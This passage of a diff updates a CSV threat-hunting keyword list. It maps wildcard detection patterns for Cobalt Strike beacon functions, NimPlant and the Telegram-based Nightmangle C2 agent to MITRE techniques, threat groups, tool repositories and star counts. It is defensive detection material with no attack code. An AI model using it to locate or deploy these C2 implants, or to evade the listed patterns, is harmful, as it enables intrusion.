TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z" "*BEACON_RDLL_*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_remote_exec_*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" @@ -7693,20 +7839,20 @@ "*beacon_top_callback*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*BeaconApi.cs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*beacon-c2-go*","offensive_tool_keyword","cobaltstrike","backdoor c2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wahyuhadi/beacon-c2-go","1","1","N/A","10","10","36","8","2020-01-14T11:15:42Z","2019-12-22T08:59:34Z" -"*BeaconCleanupProcess*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*BeaconCleanupProcess*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" "*BeaconConsoleWriter.cs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" -"*BeaconGetSpawnTo*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*BeaconGetSpawnTo*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" "*BeaconGetSpawnTo*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*BeaconGetSpawnTo*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*BeaconGetSpawnTo*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*BeaconGetSpawnTo*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*beacongrapher.py*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" -"*BeaconInjectProcess*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*BeaconInjectProcess*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" "*BeaconInjectProcess*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*BeaconInjectProcess*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","72","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" -"*BeaconInjectProcess*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*BeaconInjectTemporaryProcess*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*BeaconInjectProcess*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" +"*BeaconInjectProcess*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*BeaconInjectTemporaryProcess*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" "*BeaconInjectTemporaryProcess*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*BeaconInjectTemporaryProcess*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","72","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" +"*BeaconInjectTemporaryProcess*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - 